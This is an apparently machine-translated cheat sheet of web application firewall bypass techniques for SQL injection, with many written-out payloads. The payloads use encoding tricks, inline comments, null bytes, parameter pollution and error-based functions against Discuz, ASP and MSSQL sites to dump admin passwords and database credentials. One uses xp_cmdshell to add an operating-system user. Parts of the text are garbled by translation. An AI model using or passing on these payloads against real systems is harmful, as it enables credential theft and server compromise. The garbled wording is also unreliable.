Notes for bypassing waf

1. Various codes bypass id = 1 union select pass from admin limit 1id = 1% 20% 75% 69% 6e % 20% 6f % 6e % 73% 65% 65% 6c % 63% 74% 20% 70% 61% 73% 73% 20% 66% 72% 6f % 6d % 20% 61% 64% 6d % 69% 6e % 20% 6c % 69% 6d % 69% 74% 20% 31 2. encoding 'E' => '% u0065 ′, // This is his Unicode code id = 1 union select pass from admin limit 1 id = 1 un % u0069on sel % u 0065ct pass f % u0072om admin li % u006dit 1 3. for disucz x built-in _ do_query_safe () Bypass

Gid = 1 and 1 = 2 union select 1, 2, 3, 4, 5, 6, concat (user, 0x23, password), 8, 9, 10, 11, 12, 13 from mysql. user intercept gid = 1 and 1 = 2 union /*! 50000select */1, 2, 4, 5, 6, concat (user, 0x23, password), 8, 9, 10, 11, 12, 13 from mysql. user bypasses disucz x2.0gid = @ '''union select @ ''', concat (user, 0x3a, password), from mysql. user bypasses disucz x2.5gid = ''' or @ ''' union select 1 from (select count (*), concat (select database (), floor (rand (0) * 2) a from information_schema.tables group by a) B where @ ''' bypasses disucz x2.5 secondary Patching

Here, I introduced ''' to hide the First @ character and replace the first @ ''' with @ ''', so that the second @ 4 can be replaced. attackers can bypass a waf-by havij

/*!30000union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 10,1),null,null,null,null*/--list.php?yw=bj&id=3&id=1 /*!30000union all select (select concat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27) from `gs_ucenter`.uc_members limit 0,1) ,null,null,null,null*/--

 

5. A note

newsid=60+a%nd%201=(se%lect%20@@VERSION)--newsid=60+a%nd%201=(se%lect%20@@servername)--newsid=60+a%nd 1=(se%lect name f%rom mas%ter.dbo.sysd%atabases wh%ere dbid=1)--newsid=60+a%nd (se%lect t%o%p 1 name f%rom pedaohang.d%b%o.s%ys%obje%cts where xtype='U' a%nd name not in (se%lect top 1 name fr%om gpbctv.dbo.sysobjects wh%ere xtype='U'))>0--newsid=60+a%nd (se%lect t%o%p 1 col_name(object_id('Art_Admin'),1) f%rom sysobjects)>0--newsid=60+a%nd (se%lect t%o%p 1 pass fr%om Art_Admin where pass not in (se%lect t%o%p 1 pass fr%om Art_Admin))>0--

 

Asp. when the dll file decodes the url of the Post-asp file parameter string, it will directly filter out 09-0d (09 is the tab key, 0d is the carriage return), 20 (Space) and % (one or more of the following two characters is not in hexadecimal format. Therefore, protection at the network layer will be bypassed as long as the built-in rules are larger than two characters. If the built-in rules are... you can use. % to bypass. 6 to bypass the professional firewall of the website.

Http://fuck.0day5.com/shownews.asp? Id = % 28-575% 29 UNION % 20% 28 SELECT % 201, username, 3, 4, passwd, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18% 20 from % 28 admin % 29% 29 intercept http://fuck.0day5.com/shownews.asp? Id = % 28-575% 29 UNION % 20% 28 SELECT % 201, username, 3, 4, passwd, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18% 20 from % 28 admin % 29% 29 Bypass

 

Here, SEL % E % CT is used to replace select. Simply put, this network layer waf fails to perform url Decoding on SEL % E % CT and then becomes SEL % E % CT matching select, and enter asp. dll decodes the url of SEL % E % CT but changes it to select. Asp. when the dll file decodes the url of the Post-asp file parameter string, it will directly filter out 09-0d (09 is the tab key, 0d is the carriage return), 20 (Space) and % (one or more of the following two characters is not in hexadecimal format. TIPS: early smart creations can bypass cookies. By viewing the product description, we found that it only filters GET and POST data (that is, QueryString and PostData ). 7. Early dongle bypass 1) NULL Byte truncation breakthrough dongle itself against xx. asp? Id = 69 and 1 = 1 and xx. asp? Id = 69 and 1 = 2 these are filtered, but for xx. asp? 0day5.com = % 00. & xw_id = 69% 20 and 1 = 1 and xx. asp? 0day5.com = % 00. & xw_id = 69% 20 and 1 = 2 is normal, and it is OK to directly drop the tool. // % 00 is equivalent to NULL, And the null character is truncated. WAF is truncated when the parse url parameter is set to 2) using u % n % I % o % n + s % e % l % e % cT for code bypass was rarely successful, although bypassing 3) using the complex parameters-encountered in the confidence contest http://hack.myclover.org/pentration/4/yinmou.php?id=4 http://hack.myclover.org/pentration/4/yinmou.php?id=1&id=1/ **/And/**/1 = 2/**/Union/**/Select/**/1, concat % 28 database % 28% 29, 0x3a, user % 28% 29, 0x3a, version % 28% 29% 29,3 or write an injection vertex, and then run the sqlmap randomcase and space2comment plug-ins. 4) The latest dog, recently, I have never been pressured to replace spaces with/**/and use a % n % d to replace from, which is similar to f % u0072om 4) the agent uses Baidu or google's agent: google Spider: Googlebot Baidu Spider: Baiduspider 8. database bypass mysql: inline comment: select-> /*! Select */. select? User, password? From? User? Xxx? Union? Select (1), (2); space in Mysql can also be replaced with + or. (remember that Mysql select-> sele/**/ct cannot be written in this way. Many articles say this is wrong! MSSQL's loose problem can be written in this way, which is described below .) 9. GET parameter SQL Injection % 0A line feed contamination bypass Description: In a GET request, the url SQL Injection keyword is separated by % 0A, % 0A is a line break, and can be executed normally in mysql. Test method: Request test url: http://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4 -Intercepted request test url: http://www.webshell.cc/1.php?id=-9%0Aunion%0Aselect 1, 2, 3, 4 -- MSSQL bypass: HEX bypass. Generally, IDS cannot detect 0x730079007300610064006D0069006E00 = hex (sysadmin) Authorization = hex (db_owner). For example, declare a variable a first, assign the value of our command to a and call variable a to execute the command we entered. Variable a can be any command. As follows:

Declare @ a sysnameselect @ a = exec master. dbo. xp_mongoshell @ ahttp: // www.xxx.com/xxx.asp? Id = 1; declare % 20 @ a % 20 sysname % 20 select @ a = running exec master. dbo. xp_mongoshell @ a; -- equals means "net user angel pass/add.

 

Here is SQL encoding. We also introduced the loose nature of mssql through space bypass. You can look back. use the comment statement to bypass the use of/**/instead of space, such as: UNION/**/Select/**/user, pwd, from tbluser use/**/to separate sensitive words, for example: U/**/NION/**/SE/**/LECT/**/user, pwd from tbluser Access: Use (), [] where, "[]" is used for tables and columns, and "()" is used to separate numerical values. http://fuck.0day5.com/shownews.asp?id=%28-575%29UNION%20SE%LECT%201 , Username, 3, 4, passwd, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18% 20 from [admin] admin use [] Haha, the preceding SE % LECT encoding has been introduced. http://fuck.0day5.com/shownews.asp?id=%28-575%29UNION%20SE%LECT%201 , [Username], 18%, [passwd], from [admin] username passwd also come [] haha. as mentioned earlier: http://fuck.0day5.com/shownews.asp?id=%28-575%29UNION%20%28SE%LECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20%28admin%29%29 Admin table () (SELECT ........) The double brackets () and [] can be used to test and use them flexibly. http://fuck.0day5.com/shownews.asp?id=575and%201=2 http://fuck.0day5.com/shownews.asp?id=575and%201=1 Haha, do you find any highlights? Yes, Access also has loose spaces ~~~~ 575and 1 = 2 575and 1 = 1 2. Do you want to bypass the complex parameters? Id = 1 union select 1 & id = pass from admin as mentioned above: http://fuck.0day5.com/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 This link will be intercepted... Use this link: http://fuck.0day5.com/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=18%20from%28admin%29%29 Comparison of the two links: The second link is more than the first link: & id = the second link is less than the first link: I bypassed WAF in the form of parameter overwrite, the parameter reuse & id = xx-> of asp changes to xx. xx is an asp BUG and a bypass technique. php can also overwrite the bypass type with variables, different from asp: http://xxx.com/test.php?id=0 Written: http://xxx.com/test.php?id=0 & Id = 7 and 1 = 2 // & id = 0-> it becomes & id = 7 and 1 = 2 and does not appear like asp! Id parameter duplicate variable bypass, duplicate variable variation. This method depends on the actual situation. Some WAF allows variable overwrite, that is, the same variables are assigned different values, overwriting the waf cache. However, the backend program will give priority to the first value. 3. The exception Method bypasses Seay/1.php? Id = 1 and 1 = 1 HTTP/1.1 Host: www.cnseay.com Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3 Accept-Encoding: gzip, deflate Connection: keep-alive 4. exception Method bypass 5. encoding method bypass (urlencoded/from-data) 6. large data packets bypass 7. packet multipart transmission bypass 1. Database special syntax bypass 1. mysql. symbol and ~ Symbol and! Symbol and the connection between + and? Id = 1. union % 0aselect @ 1, 2 ,! 3, 4. Keyword splitting bypass cnseay.com/1.aspx? Id = 1; EXEC ('Ma' + 'ster .. x' + 'P _ cm '+ 'dsh' + 'ell "net user"') III. LAX request method difference rules bypass GET/id = 1 union select 1, 2, 3, 4-intercept POST id = 1 union select 1, 2, 4-bypass waf business restrictions, POST rules are relatively lax 4. unpopular functions/labels bypass 1. /1.php? Id = 1 and 1 = (updatexml (1, concat (0x3a, (select user (), 1) 2./1.php? Id = 1 and extractvalue (1, concat (0x5c, (select table_name from information_schema.tables limit 1); V. Summary of bypassing in WAF rule policy Phase 1. case-insensitive conversion 2. database special syntax bypass 3. keyword splitting bypass 4. request Method difference rules loose bypass 5. multi-URL pseudo-static bypass 6. white character bypass 7. unpopular function/Tag Bypass